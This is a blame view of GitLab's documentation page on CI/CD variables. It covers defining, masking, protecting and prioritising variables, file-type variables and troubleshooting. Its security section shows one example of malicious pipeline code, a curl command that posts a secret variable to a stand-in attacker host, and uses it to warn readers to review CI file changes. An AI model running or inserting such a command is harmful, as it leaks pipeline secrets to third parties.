debian-mirror-gitlab/doc/ci/variables/index.md

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

833 lines
36 KiB
Markdown
Raw Normal View History

2021-09-30 23:02:18 +05:30
---
stage: Verify
group: Pipeline Authoring
2022-11-25 23:54:43 +05:30
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/product/ux/technical-writing/#assignments
2021-09-30 23:02:18 +05:30
type: reference
---
# GitLab CI/CD variables **(FREE)**
CI/CD variables are a type of environment variable. You can use them to:
- Control the behavior of jobs and [pipelines](../pipelines/index.md).
- Store values you want to re-use.
- Avoid hard-coding values in your `.gitlab-ci.yml` file.
2023-03-17 16:20:25 +05:30
You can use:
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
- [Predefined CI/CD variables](#predefined-cicd-variables).
- [Variables defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
- [Variables defined in project, group, or instance settings](#define-a-cicd-variable-in-the-ui).
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
You can [override variable values manually for a specific pipeline](../jobs/index.md#specifying-variables-when-running-manual-jobs),
or have them [prefilled in manual pipelines](../pipelines/index.md#prefill-variables-in-manual-pipelines).
2021-11-11 11:23:49 +05:30
2023-03-17 16:20:25 +05:30
Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/index.html)
to execute scripts. Each shell has its own set of reserved variable names.
Make sure each variable is defined for the [scope you want to use it in](where_variables_can_be_used.md).
2021-11-11 11:23:49 +05:30
2021-09-30 23:02:18 +05:30
> For more information about advanced use of GitLab CI/CD:
>
> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i>&nbsp;Get to productivity faster with these [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/)
> shared by GitLab engineers.
> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i>&nbsp;Learn how the Cloud Native Computing Foundation (CNCF) [eliminates the complexity](https://about.gitlab.com/customers/cncf/)
> of managing projects across many cloud providers with GitLab CI/CD.
## Predefined CI/CD variables
2023-03-17 16:20:25 +05:30
GitLab CI/CD makes a set of [predefined CI/CD variables](predefined_variables.md)
available for use in pipeline configuration and job scripts. You can use predefined CI/CD variables
in your `.gitlab-ci.yml` without declaring them first.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
For example:
2021-09-30 23:02:18 +05:30
```yaml
2023-03-17 16:20:25 +05:30
job1:
2021-09-30 23:02:18 +05:30
stage: test
script:
- echo "$CI_JOB_STAGE"
```
2023-03-17 16:20:25 +05:30
The script in this example outputs the stage for the `job1` job, which is `test`.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
## Define a CI/CD variable in the `.gitlab-ci.yml` file
2021-09-30 23:02:18 +05:30
To create a custom variable in the [`.gitlab-ci.yml`](../yaml/index.md#variables) file,
define the variable and value with `variables` keyword.
You can use the `variables` keyword in a job or at the top level of the `.gitlab-ci.yml` file.
If the variable is at the top level, it's globally available and all jobs can use it.
If it's defined in a job, only that job can use it.
```yaml
variables:
TEST_VAR: "All jobs can use this variable's value"
job1:
variables:
TEST_VAR_JOB: "Only job1 can use this variable's value"
script:
- echo "$TEST_VAR" and "$TEST_VAR_JOB"
```
Variables saved in the `.gitlab-ci.yml` file should store only non-sensitive project
configuration, like a `RAILS_ENV` or `DATABASE_URL` variable. These variables are
2023-01-13 00:05:48 +05:30
visible in the repository. Store sensitive variables containing values like secrets or keys
2021-09-30 23:02:18 +05:30
in project settings.
Variables saved in the `.gitlab-ci.yml` file are also available in [service containers](../docker/using_docker_images.md).
If you don't want globally defined variables to be available in a job, set `variables`
to `{}`:
```yaml
job1:
variables: {}
script:
- echo This job does not need any variables
```
2021-12-11 22:18:48 +05:30
Use the [`value` and `description`](../yaml/index.md#variablesdescription)
2021-10-27 15:23:28 +05:30
keywords to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines)
for [manually-triggered pipelines](../pipelines/index.md#run-a-pipeline-manually).
2023-03-17 16:20:25 +05:30
## Define a CI/CD variable in the UI
2021-10-27 15:23:28 +05:30
2023-03-17 16:20:25 +05:30
You can define CI/CD variables in the UI:
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
- For a project:
- [In the project's settings](#for-a-project).
- [With the API](../../api/project_level_variables.md).
- For all projects in a group [in the group's setting](#for-a-group).
- For all projects in a GitLab instance [in the instance's settings](#for-an-instance).
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
By default, pipelines from forked projects can't access CI/CD variables in the parent project.
If you [run a merge request pipeline in the parent project for a merge request from a fork](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project),
all variables become available to the pipeline.
2021-11-11 11:23:49 +05:30
2023-03-17 16:20:25 +05:30
Variables set in the GitLab UI are **not** passed down to [service containers](../docker/using_docker_images.md).
To set them, assign them to variables in the UI, then re-assign them in your `.gitlab-ci.yml`:
2021-10-27 15:23:28 +05:30
```yaml
2023-03-17 16:20:25 +05:30
variables:
SA_PASSWORD: $SA_PASSWORD
2021-10-27 15:23:28 +05:30
```
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
### For a project
2021-09-30 23:02:18 +05:30
2023-03-04 22:38:38 +05:30
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/362227) in GitLab 15.7, projects can define a maximum of 200 CI/CD variables.
2021-09-30 23:02:18 +05:30
You can add CI/CD variables to a project's settings. Only project members with the
2022-04-04 11:22:00 +05:30
Maintainer role
2021-09-30 23:02:18 +05:30
can add or update project CI/CD variables. To keep a CI/CD variable secret, put it
in the project settings, not in the `.gitlab-ci.yml` file.
To add or update variables in the project settings:
1. Go to your project's **Settings > CI/CD** and expand the **Variables** section.
2023-01-13 00:05:48 +05:30
1. Select **Add variable** and fill in the details:
2021-09-30 23:02:18 +05:30
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
- **Value**: No limitations.
2023-03-17 16:20:25 +05:30
- **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
- **Environment scope**: Optional. `All`, or specific [environments](../environments/index.md#limit-the-environment-scope-of-a-cicd-variable).
2022-01-26 12:08:38 +05:30
- **Protect variable** Optional. If selected, the variable is only available
2022-07-16 23:28:13 +05:30
in pipelines that run on [protected branches](../../user/project/protected_branches.md) or [protected tags](../../user/project/protected_tags.md).
2022-01-26 12:08:38 +05:30
- **Mask variable** Optional. If selected, the variable's **Value** is masked
2021-09-30 23:02:18 +05:30
in job logs. The variable fails to save if the value does not meet the
[masking requirements](#mask-a-cicd-variable).
2023-03-17 16:20:25 +05:30
After you create a variable, you can use it in the [`.gitlab-ci.yml` configuration](../yaml/index.md)
or in [job scripts](#use-cicd-variables-in-job-scripts).
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
### For a group
2021-09-30 23:02:18 +05:30
2023-03-04 22:38:38 +05:30
> - Support for environment scopes [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/2874) in GitLab Premium 13.11
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/362227) in GitLab 15.7, groups can define a maximum of 200 CI/CD variables.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
To make a CI/CD variable available to all projects in a group, define a group CI/CD variable.
You must be a group owner.
2021-09-30 23:02:18 +05:30
Use group variables to store secrets like passwords, SSH keys, and credentials, if you:
2023-03-17 16:20:25 +05:30
- Do not use an external key store.
2021-09-30 23:02:18 +05:30
- Use the GitLab [integration with HashiCorp Vault](../secrets/index.md).
To add a group variable:
1. In the group, go to **Settings > CI/CD**.
2023-01-13 00:05:48 +05:30
1. Select **Add variable** and fill in the details:
2021-09-30 23:02:18 +05:30
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
- **Value**: No limitations.
2023-03-17 16:20:25 +05:30
- **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
- **Environment scope** Optional. `All`, or specific [environments](../environments/index.md#limit-the-environment-scope-of-a-cicd-variable). **(PREMIUM)**
2022-01-26 12:08:38 +05:30
- **Protect variable** Optional. If selected, the variable is only available
2021-09-30 23:02:18 +05:30
in pipelines that run on protected branches or tags.
2022-01-26 12:08:38 +05:30
- **Mask variable** Optional. If selected, the variable's **Value** is masked
2021-09-30 23:02:18 +05:30
in job logs. The variable fails to save if the value does not meet the
[masking requirements](#mask-a-cicd-variable).
2023-03-17 16:20:25 +05:30
The group variables that are available in a project are listed in the project's
**Settings > CI/CD > Variables** section. Variables from [subgroups](../../user/group/subgroups/index.md)
are recursively inherited.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
### For an instance **(FREE SELF)**
2021-09-30 23:02:18 +05:30
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14108) in GitLab 13.0.
> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/299879) in GitLab 13.11.
To make a CI/CD variable available to all projects and groups in a GitLab instance,
2022-04-04 11:22:00 +05:30
add an instance CI/CD variable. You must have administrator access.
2021-09-30 23:02:18 +05:30
You can define instance variables via the UI or [API](../../api/instance_level_ci_variables.md).
To add an instance variable:
2022-10-11 01:57:18 +05:30
1. On the top bar, select **Main menu > Admin**.
2021-09-30 23:02:18 +05:30
1. On the left sidebar, select **Settings > CI/CD** and expand the **Variables** section.
2023-01-13 00:05:48 +05:30
1. Select **Add variable** and fill in the details:
2021-09-30 23:02:18 +05:30
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
2021-11-18 22:05:49 +05:30
- **Value**: In [GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/220028),
2023-03-17 16:20:25 +05:30
the value is limited to 10,000 characters, but also bounded by any limits in the
runner's operating system. In GitLab 13.0 to 13.2, the value is limited to 700 characters.
- **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
2022-01-26 12:08:38 +05:30
- **Protect variable** Optional. If selected, the variable is only available
2021-09-30 23:02:18 +05:30
in pipelines that run on protected branches or tags.
2022-01-26 12:08:38 +05:30
- **Mask variable** Optional. If selected, the variable's **Value** is not shown
2021-09-30 23:02:18 +05:30
in job logs. The variable is not saved if the value does not meet the [masking requirements](#mask-a-cicd-variable).
2023-03-17 16:20:25 +05:30
The instance variables that are available in a project are listed in the project's
**Settings > CI/CD > Variables** section.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
## CI/CD variable security
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables
and send them to a third party server regardless of the masked setting. If the pipeline
runs on a [protected branch](../../user/project/protected_branches.md) or
[protected tag](../../user/project/protected_tags.md), malicious code can compromise protected variables.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you:
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
- [Run a pipeline in the parent project for a merge request submitted from a forked project](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project).
- Merge the changes.
2021-11-11 11:23:49 +05:30
2023-03-17 16:20:25 +05:30
Review the `.gitlab-ci.yml` file of imported projects before you add files or run pipelines against them.
2021-11-11 11:23:49 +05:30
2023-03-17 16:20:25 +05:30
The following example shows malicious code in a `.gitlab-ci.yml` file:
2021-11-11 11:23:49 +05:30
```yaml
2023-03-17 16:20:25 +05:30
build:
2021-11-11 11:23:49 +05:30
script:
2023-03-17 16:20:25 +05:30
- curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"
2021-11-11 11:23:49 +05:30
```
2023-03-17 16:20:25 +05:30
Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard)
and stored in the database. This data can only be read and decrypted with a
valid [secrets file](../../raketasks/backup_restore.md#when-the-secrets-file-is-lost).
2021-09-30 23:02:18 +05:30
### Mask a CI/CD variable
2023-01-13 00:05:48 +05:30
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/330650) in GitLab 13.12, the `~` character can be used in masked variables.
2021-09-30 23:02:18 +05:30
You can mask a project, group, or instance CI/CD variable so the value of the variable
does not display in job logs.
To mask a variable:
1. In the project, group, or Admin Area, go to **Settings > CI/CD**.
1. Expand the **Variables** section.
1. Next to the variable you want to protect, select **Edit**.
2021-10-27 15:23:28 +05:30
1. Select the **Mask variable** checkbox.
2021-09-30 23:02:18 +05:30
1. Select **Update variable**.
2022-08-13 15:12:31 +05:30
The method used to mask variables [limits what can be included in a masked variable](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784#note_106756757).
2021-09-30 23:02:18 +05:30
The value of the variable must:
- Be a single line.
- Be 8 characters or longer, consisting only of:
- Characters from the Base64 alphabet (RFC4648).
2023-01-13 00:05:48 +05:30
- The `@`, `:`, `.`, or `~` characters.
2021-09-30 23:02:18 +05:30
- Not match the name of an existing predefined or custom CI/CD variable.
2021-10-27 15:23:28 +05:30
WARNING:
2023-01-13 00:05:48 +05:30
Masking a CI/CD variable is not a guaranteed way to prevent malicious users from
accessing variable values. The masking feature is "best-effort" and there to
help when a variable is accidentally revealed. To make variables more secure,
2023-03-17 16:20:25 +05:30
consider using [external secrets](../secrets/index.md) and [file type variables](#use-file-type-cicd-variables)
2023-01-13 00:05:48 +05:30
to prevent commands such as `env`/`printenv` from printing secret variables.
Runner versions implement masking in different ways, some with technical
limitations. Below is a table of such limitations.
| Version from | Version to | Limitations |
| ------------ | ---------- | ------ |
| v11.9.0 | v14.1.0 | Masking of large secrets (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v14.2.0 | v15.3.0 | The tail of a large secret (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v15.7.0 | | Potential for secrets to be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/index.md#capturing-service-container-logs). |
2021-10-27 15:23:28 +05:30
2023-03-17 16:20:25 +05:30
### Protect a CI/CD variable
2021-09-30 23:02:18 +05:30
2022-07-16 23:28:13 +05:30
You can configure a project, group, or instance CI/CD variable to be available
only to pipelines that run on [protected branches](../../user/project/protected_branches.md)
2021-09-30 23:02:18 +05:30
or [protected tags](../../user/project/protected_tags.md).
2022-07-23 23:45:48 +05:30
[Merged results pipelines](../pipelines/merged_results_pipelines.md), which run on a
2022-07-16 23:28:13 +05:30
temporary merge commit, not a branch or tag, do not have access to these variables.
Pipelines that run directly on the merge request's source branch, with no added merge commit, can access
these variables if the source branch is a protected branch.
2021-10-27 15:23:28 +05:30
2022-07-16 23:28:13 +05:30
To mark a variable as protected:
2021-09-30 23:02:18 +05:30
2022-07-16 23:28:13 +05:30
1. Go to **Settings > CI/CD** in the project, group or instance Admin Area.
2021-09-30 23:02:18 +05:30
1. Expand the **Variables** section.
1. Next to the variable you want to protect, select **Edit**.
2021-10-27 15:23:28 +05:30
1. Select the **Protect variable** checkbox.
2021-09-30 23:02:18 +05:30
1. Select **Update variable**.
The variable is available for all subsequent pipelines.
2023-03-17 16:20:25 +05:30
### Use file type CI/CD variables
2023-03-04 22:38:38 +05:30
2023-03-17 16:20:25 +05:30
All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file
are `Variable` type. Project, group and instance CI/CD variables can be `Variable`
or `File` type.
2023-03-04 22:38:38 +05:30
2023-03-17 16:20:25 +05:30
`Variable` type variables:
2023-03-04 22:38:38 +05:30
2023-03-17 16:20:25 +05:30
- Consist of a key and value pair.
- Are made available in jobs as environment variables, with:
- The CI/CD variable key as the environment variable name.
- The CI/CD variable value as the environment variable value.
2023-03-04 22:38:38 +05:30
2023-03-17 16:20:25 +05:30
Use `File` type CI/CD variables for tools that need a file as input.
2023-03-04 22:38:38 +05:30
2023-03-17 16:20:25 +05:30
`File` type variables:
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
- Consist of a key, value and file.
- Are made available in jobs as environment variables, with
- The CI/CD variable key as the environment variable name.
- The CI/CD variable value saved to a temporary file.
- The path to the temporary file as the environment variable value.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
Some tools like [the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html)
and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable)
use `File` type variables for configuration.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
For example, if you have the following variables:
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
- A variable of type `Variable`: `KUBE_URL` with the value `https://example.com`.
- A variable of type `File`: `KUBE_CA_PEM` with a certificate as the value.
2022-08-13 15:12:31 +05:30
2023-03-17 16:20:25 +05:30
Use the variables in a job script like this:
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
```shell
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM"
2021-09-30 23:02:18 +05:30
```
2023-03-17 16:20:25 +05:30
WARNING:
Be careful when assigning the value of a file variable to another variable. The other
variable takes the content of the file as its value, **not** the path to the file.
See [issue 29407](https://gitlab.com/gitlab-org/gitlab/-/issues/29407) for more details.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
An alternative to `File` type variables is to:
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
- Read the value of a CI/CD variable (`variable` type).
- Save the value in a file.
- Use that file in your script.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
```shell
# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file
echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem"
# Pass the newly created file to kubectl
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem"
```
2021-09-30 23:02:18 +05:30
## Use CI/CD variables in job scripts
All CI/CD variables are set as environment variables in the job's environment.
You can use variables in job scripts with the standard formatting for each environment's
shell.
To access environment variables, use the syntax for your [runner executor's shell](https://docs.gitlab.com/runner/executors/).
2023-03-17 16:20:25 +05:30
### With Bash, `sh` and similar
2021-09-30 23:02:18 +05:30
To access environment variables in Bash, `sh`, and similar shells, prefix the
CI/CD variable with (`$`):
```yaml
job_name:
script:
- echo "$CI_JOB_ID"
```
2023-03-17 16:20:25 +05:30
### With PowerShell
2021-09-30 23:02:18 +05:30
To access variables in a Windows PowerShell environment, including environment
variables set by the system, prefix the variable name with (`$env:`) or (`$`):
```yaml
job_name:
script:
- echo $env:CI_JOB_ID
- echo $CI_JOB_ID
- echo $env:PATH
```
In [some cases](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4115#note_157692820)
2021-10-27 15:23:28 +05:30
environment variables must be surrounded by quotes to expand properly:
2021-09-30 23:02:18 +05:30
```yaml
job_name:
script:
- D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test
```
2023-03-17 16:20:25 +05:30
### With Windows Batch
2021-09-30 23:02:18 +05:30
To access CI/CD variables in Windows Batch, surround the variable
with `%`:
```yaml
job_name:
script:
- echo %CI_JOB_ID%
```
You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html).
Delayed expansion might be needed for variables that contain white spaces or newlines.
```yaml
job_name:
script:
- echo !ERROR_MESSAGE!
```
2023-03-17 16:20:25 +05:30
### Pass an environment variable to another job
2021-09-30 23:02:18 +05:30
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22638) in GitLab 13.0.
> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/217834) in GitLab 13.1.
2022-03-02 08:16:31 +05:30
You can pass environment variables from one job to another job in a later stage
through variable inheritance.
2021-09-30 23:02:18 +05:30
These variables cannot be used as CI/CD variables to configure a pipeline, but
they can be used in job scripts.
1. In the job script, save the variable as a `.env` file.
2022-03-02 08:16:31 +05:30
- The format of the file must be one variable definition per line.
- Each defined line must be of the form `VARIABLE_NAME=ANY VALUE HERE`.
- Values can be wrapped in quotes, but cannot contain newline characters.
2022-01-26 12:08:38 +05:30
1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/artifacts_reports.md#artifactsreportsdotenv)
2023-03-17 16:20:25 +05:30
artifact.
2022-03-02 08:16:31 +05:30
1. Jobs in later stages can then [use the variable in scripts](#use-cicd-variables-in-job-scripts).
2021-09-30 23:02:18 +05:30
2022-03-02 08:16:31 +05:30
Inherited variables [take precedence](#cicd-variable-precedence) over
certain types of new variable definitions such as job defined variables.
2021-09-30 23:02:18 +05:30
```yaml
build:
stage: build
script:
2022-03-02 08:16:31 +05:30
- echo "BUILD_VARIABLE=value_from_build_job" >> build.env
2021-09-30 23:02:18 +05:30
artifacts:
reports:
dotenv: build.env
deploy:
stage: deploy
2022-03-02 08:16:31 +05:30
variables:
BUILD_VARIABLE: value_from_deploy_job
2021-09-30 23:02:18 +05:30
script:
2022-03-02 08:16:31 +05:30
- echo "$BUILD_VARIABLE" # Output is: 'value_from_build_job' due to precedence
2022-10-11 01:57:18 +05:30
environment: production
2021-09-30 23:02:18 +05:30
```
2022-03-02 08:16:31 +05:30
The [`dependencies`](../yaml/index.md#dependencies) or
[`needs`](../yaml/index.md#needs) keywords can be used to control
which jobs receive inherited values.
To have no inherited dotenv environment variables, pass an empty `dependencies` or
`needs` list, or pass [`needs:artifacts`](../yaml/index.md#needsartifacts) as `false`
2021-09-30 23:02:18 +05:30
```yaml
build:
stage: build
script:
- echo "BUILD_VERSION=hello" >> build.env
artifacts:
reports:
dotenv: build.env
2022-03-02 08:16:31 +05:30
deploy_one:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
dependencies:
- build
2022-10-11 01:57:18 +05:30
environment:
name: customer1
deployment_tier: production
2022-03-02 08:16:31 +05:30
deploy_two:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is empty
dependencies: []
2022-10-11 01:57:18 +05:30
environment:
name: customer2
deployment_tier: production
2022-03-02 08:16:31 +05:30
deploy_three:
2021-09-30 23:02:18 +05:30
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
needs:
2022-03-02 08:16:31 +05:30
- build
2022-10-11 01:57:18 +05:30
environment:
name: customer3
deployment_tier: production
2022-03-02 08:16:31 +05:30
deploy_four:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
needs:
job: build
artifacts: true
2022-10-11 01:57:18 +05:30
environment:
name: customer4
deployment_tier: production
2022-03-02 08:16:31 +05:30
deploy_five:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is empty
needs:
job: build
artifacts: false
2022-10-11 01:57:18 +05:30
environment:
name: customer5
deployment_tier: production
2021-09-30 23:02:18 +05:30
```
2022-10-11 01:57:18 +05:30
[Multi-project pipelines](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job)
2022-03-02 08:16:31 +05:30
can also inherit variables from their upstream pipelines.
2023-03-17 16:20:25 +05:30
### Store multiple values in one variable
You cannot create a CI/CD variable that is an array of values, but you
can use shell scripting techniques for similar behavior.
For example, you can store multiple variables separated by a space in a variable,
then loop through the values with a script:
```yaml
job1:
variables:
FOLDERS: src test docs
script:
- |
for FOLDER in $FOLDERS
do
echo "The path is root/${FOLDER}"
done
```
## Use CI/CD variables in other variables
You can use variables inside other variables:
```yaml
job:
variables:
FLAGS: '-al'
LS_CMD: 'ls "$FLAGS"'
script:
- 'eval "$LS_CMD"' # Executes 'ls -al'
```
### Use the `$` character in CI/CD variables
If you do not want the `$` character interpreted as the start of a variable, use `$$` instead:
```yaml
job:
variables:
FLAGS: '-al'
LS_CMD: 'ls "$FLAGS" $$TMP_DIR'
script:
- 'eval "$LS_CMD"' # Executes 'ls -al $TMP_DIR'
```
### Prevent CI/CD variable expansion
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217309) in GitLab 15.7.
Expanded variables treat values with the `$` character as a reference to another variable.
CI/CD variables are expanded by default.
To treat variables with a `$` character as raw strings, disable variable expansion for the variable:
1. In the project or group, go to **Settings > CI/CD**.
1. Expand the **Variables** section.
1. Next to the variable you want to do not want expanded, select **Edit**.
1. Clear the **Expand variable** checkbox.
1. Select **Update variable**.
2021-09-30 23:02:18 +05:30
## CI/CD variable precedence
You can use CI/CD variables with the same name in different places, but the values
can overwrite each other. The type of variable and where they are defined determines
which variables take precedence.
The order of precedence for variables is (from highest to lowest):
2022-04-04 11:22:00 +05:30
1. These all have the same (highest) precedence:
- [Trigger variables](../triggers/index.md#pass-cicd-variables-in-the-api-call).
2022-05-07 20:08:51 +05:30
- [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule).
2022-04-04 11:22:00 +05:30
- [Manual pipeline run variables](#override-a-variable-when-running-a-pipeline-manually).
- Variables added when [creating a pipeline with the API](../../api/pipelines.md#create-a-new-pipeline).
2023-03-17 16:20:25 +05:30
1. Project [variables](#for-a-project).
1. Group [variables](#for-a-group). If the same variable name exists in a
2022-11-25 23:54:43 +05:30
group and its subgroups, the job uses the value from the closest subgroup. For example, if
you have `Group > Subgroup 1 > Subgroup 2 > Project`, the variable defined in
`Subgroup 2` takes precedence.
2023-03-17 16:20:25 +05:30
1. Instance [variables](#for-an-instance).
2021-09-30 23:02:18 +05:30
1. [Inherited variables](#pass-an-environment-variable-to-another-job).
1. Variables defined in jobs in the `.gitlab-ci.yml` file.
1. Variables defined outside of jobs (globally) in the `.gitlab-ci.yml` file.
2023-03-17 16:20:25 +05:30
1. [Deployment variables](predefined_variables.md#deployment-variables).
2021-09-30 23:02:18 +05:30
1. [Predefined variables](predefined_variables.md).
In the following example, when the script in `job1` executes, the value of `API_TOKEN` is `secure`.
Variables defined in jobs have a higher precedence than variables defined globally.
```yaml
variables:
API_TOKEN: "default"
job1:
variables:
API_TOKEN: "secure"
script:
- echo "The variable value is $API_TOKEN"
```
2023-03-17 16:20:25 +05:30
### Override a defined CI/CD variable
2021-09-30 23:02:18 +05:30
You can override the value of a variable when you:
1. [Run a pipeline manually](#override-a-variable-when-running-a-pipeline-manually) in the UI.
1. Create a pipeline by using [the API](../../api/pipelines.md#create-a-new-pipeline).
1. Run a job manually in the UI.
1. Use [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd).
2022-01-26 12:08:38 +05:30
1. Trigger a pipeline by using [the API](../triggers/index.md#pass-cicd-variables-in-the-api-call).
2022-10-11 01:57:18 +05:30
1. Pass variables to a downstream pipeline [by using the `variable` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline)
or [by using variable inheritance](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job).
2021-09-30 23:02:18 +05:30
The pipeline variables declared in these events take [priority over other variables](#cicd-variable-precedence).
2022-07-23 23:45:48 +05:30
NOTE:
You should avoid overriding [predefined variables](predefined_variables.md),
as it can cause the pipeline to behave unexpectedly.
2021-09-30 23:02:18 +05:30
### Override a variable when running a pipeline manually
You can override the value of a CI/CD variable when you
[run a pipeline manually](../pipelines/index.md#run-a-pipeline-manually).
1. Go to your project's **CI/CD > Pipelines** and select **Run pipeline**.
1. Choose the branch you want to run the pipeline for.
1. Input the variable and its value in the UI.
### Restrict who can override variables
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/295234) in GitLab 13.8.
2023-03-04 22:38:38 +05:30
You can grant permission to override variables to users with the Maintainer role only. When other users try to run a pipeline
2021-09-30 23:02:18 +05:30
with overridden variables, they receive the `Insufficient permissions to set pipeline variables`
error message.
If you [store your CI/CD configurations in a different repository](../../ci/pipelines/settings.md#specify-a-custom-cicd-configuration-file),
use this setting for control over the environment the pipeline runs in.
You can enable this feature by using [the projects API](../../api/projects.md#edit-project)
to enable the `restrict_user_defined_variables` setting. The setting is `disabled` by default.
2023-03-17 16:20:25 +05:30
## Related topics
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
- You can configure [Auto DevOps](../../topics/autodevops/index.md) to pass CI/CD variables
to a running application. To make a CI/CD variable available as an environment variable in the running application's container,
[prefix the variable key](../../topics/autodevops/cicd_variables.md#configure-application-secret-variables)
with `K8S_SECRET_`.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
- The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck)
video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo)
working example project. It explains how multiple levels of group CI/CD variables
can be combined with environment-scoped project variables for complex configuration
of application builds or deployments.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
The example can be copied to your own group or instance for testing. More details
on what other GitLab CI patterns are demonstrated are available at the project page.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
## Troubleshooting
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
### List all variables
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
You can list all variables available to a script with the `export` command
in Bash or `dir env:` in PowerShell. This exposes the values of **all** available
variables, which can be a [security risk](#cicd-variable-security).
[Masked variables](#mask-a-cicd-variable) display as `[masked]`.
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
For example:
2021-09-30 23:02:18 +05:30
2023-03-17 16:20:25 +05:30
```yaml
job_name:
script:
- export
# - 'dir env:' # Use this for PowerShell
```
